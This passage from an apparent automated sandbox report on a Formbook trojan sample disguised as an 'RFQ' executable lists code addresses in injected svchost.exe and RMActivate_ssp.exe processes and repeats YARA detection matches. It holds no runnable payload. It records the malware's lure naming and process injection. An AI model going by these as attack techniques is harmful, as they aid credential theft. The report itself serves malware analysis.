              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F428401_2_02F42840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A01_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F569621_2_02F56962
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEEDB1_2_02FFEEDB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52E901_2_02F52E90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFCE931_2_02FFCE93
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40E591_2_02F40E59
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEE261_2_02FFEE26
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32FC81_2_02F32FC8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBEFA01_2_02FBEFA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4F401_2_02FB4F40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60F301_2_02F60F30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE2F301_2_02FE2F30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F82F281_2_02F82F28
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30CF21_2_02F30CF2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0CB51_2_02FE0CB5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40C001_2_02F40C00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3ADE01_2_02F3ADE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F58DBF1_2_02F58DBF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDCD1F1_2_02FDCD1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4AD001_2_02F4AD00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5D2F01_2_02F5D2F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE12ED1_2_02FE12ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B2C01_2_02F5B2C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F452A01_2_02F452A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F8739A1_2_02F8739A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2D34C1_2_02F2D34C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF132D1_2_02FF132D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF70E91_2_02FF70E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF0E01_2_02FFF0E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEF0CC1_2_02FEF0CC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F470C01_2_02F470C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300B16B1_2_0300B16B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4B1B01_2_02F4B1B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2F1721_2_02F2F172
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7516C1_2_02F7516C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF16CC1_2_02FF16CC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F856301_2_02F85630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF7B01_2_02FFF7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F314601_2_02F31460
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF43F1_2_02FFF43F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030095C31_2_030095C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDD5B01_2_02FDD5B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF75711_2_02FF7571
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEDAC61_2_02FEDAC6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDDAAC1_2_02FDDAAC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F85AA01_2_02F85AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE1AA31_2_02FE1AA3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB3A6C1_2_02FB3A6C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFA491_2_02FFFA49
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7A461_2_02FF7A46
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB5BF01_2_02FB5BF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7DBF91_2_02F7DBF9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FB801_2_02F5FB80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB761_2_02FFFB76
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F438E01_2_02F438E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAD8001_2_02FAD800
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F499501_2_02F49950
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B9501_2_02F5B950
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD59101_2_02FD5910
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F49EB01_2_02F49EB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD21_2_02F03FD2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD51_2_02F03FD5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFFB11_2_02FFFFB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F41F921_2_02F41F92
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFF091_2_02FFFF09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFCF21_2_02FFFCF2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB9C321_2_02FB9C32
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FDC01_2_02F5FDC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7D731_2_02FF7D73
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF1D5A1_2_02FF1D5A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F43D401_2_02F43D40
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AD03E63_2_03AD03E6
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A1E3F03_2_03A1E3F0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACA3523_2_03ACA352
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A902C03_2_03A902C0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AB02743_2_03AB0274
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AD01AA3_2_03AD01AA
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC41A23_2_03AC41A2
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC81CC3_2_03AC81CC
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A001003_2_03A00100
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AAA1183_2_03AAA118
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A981583_2_03A98158
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AA20003_2_03AA2000
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A0C7C03_2_03A0C7C0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A107703_2_03A10770
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A347503_2_03A34750
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A2C6E03_2_03A2C6E0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AD05913_2_03AD0591
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A105353_2_03A10535
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ABE4F63_2_03ABE4F6
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AB44203_2_03AB4420
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC24463_2_03AC2446
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC6BD73_2_03AC6BD7
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACAB403_2_03ACAB40
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A0EA803_2_03A0EA80
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A129A03_2_03A129A0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ADA9A63_2_03ADA9A6
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A269623_2_03A26962
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039F68B83_2_039F68B8
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A3E8F03_2_03A3E8F0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A1A8403_2_03A1A840
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A128403_2_03A12840
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A8EFA03_2_03A8EFA0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A02FC83_2_03A02FC8
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A52F283_2_03A52F28
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A30F303_2_03A30F30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AB2F303_2_03AB2F30
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A84F403_2_03A84F40
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A22E903_2_03A22E90
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACCE933_2_03ACCE93
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACEEDB3_2_03ACEEDB
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACEE263_2_03ACEE26
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A10E593_2_03A10E59
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A28DBF3_2_03A28DBF
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A0ADE03_2_03A0ADE0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A1AD003_2_03A1AD00
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AACD1F3_2_03AACD1F
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AB0CB53_2_03AB0CB5
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A00CF23_2_03A00CF2
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A10C003_2_03A10C00
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A5739A3_2_03A5739A
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC132D3_2_03AC132D
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039FD34C3_2_039FD34C
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A152A03_2_03A152A0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AB12ED3_2_03AB12ED
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A2D2F03_2_03A2D2F0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A2B2C03_2_03A2B2C0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A1B1B03_2_03A1B1B0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ADB16B3_2_03ADB16B
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A4516C3_2_03A4516C
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039FF1723_2_039FF172
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC70E93_2_03AC70E9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACF0E03_2_03ACF0E0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A170C03_2_03A170C0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ABF0CC3_2_03ABF0CC
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACF7B03_2_03ACF7B0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC16CC3_2_03AC16CC
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A556303_2_03A55630
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AAD5B03_2_03AAD5B0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AD95C33_2_03AD95C3
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC75713_2_03AC7571
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACF43F3_2_03ACF43F
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A014603_2_03A01460
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A2FB803_2_03A2FB80
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A85BF03_2_03A85BF0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A4DBF93_2_03A4DBF9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACFB763_2_03ACFB76
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A55AA03_2_03A55AA0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AADAAC3_2_03AADAAC
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AB1AA33_2_03AB1AA3
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ABDAC63_2_03ABDAC6
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A83A6C3_2_03A83A6C
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACFA493_2_03ACFA49
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC7A463_2_03AC7A46
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AA59103_2_03AA5910
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A199503_2_03A19950
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A2B9503_2_03A2B950
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A138E03_2_03A138E0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A7D8003_2_03A7D800
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACFFB13_2_03ACFFB1
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A11F923_2_03A11F92
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039D3FD53_2_039D3FD5
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_039D3FD23_2_039D3FD2
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACFF093_2_03ACFF09
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A19EB03_2_03A19EB0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A2FDC03_2_03A2FDC0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC7D733_2_03AC7D73
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A13D403_2_03A13D40
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03AC1D5A3_2_03AC1D5A
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03ACFCF23_2_03ACFCF2
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_03A89C323_2_03A89C32
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB17603_2_02FB1760
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FCA0A03_2_02FCA0A0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FACB803_2_02FACB80
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAC9603_2_02FAC960
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAC9593_2_02FAC959
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAAECB3_2_02FAAECB
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAAC003_2_02FAAC00
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAADD83_2_02FAADD8
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB32703_2_02FB3270
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB326B3_2_02FB326B
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB1C703_2_02FB1C70
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0379A2F23_2_0379A2F2
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0379B0283_2_0379B028
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0379BB043_2_0379BB04
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0379BFC53_2_0379BFC5
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0379BC233_2_0379BC23
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 107 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 103 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 262 times
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: String function: 00E77F41 appears 35 times
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: String function: 00E90D27 appears 70 times
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: String function: 00E98B40 appears 42 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 03A8F290 appears 103 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 039FB970 appears 262 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 03A45130 appears 58 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 03A7EA12 appears 86 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 03A57E54 appears 107 times
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1637308145.0000000003E43000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ - MK FMHS.RFQ.24.101.exe
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1638208217.0000000003FED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ - MK FMHS.RFQ.24.101.exe
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
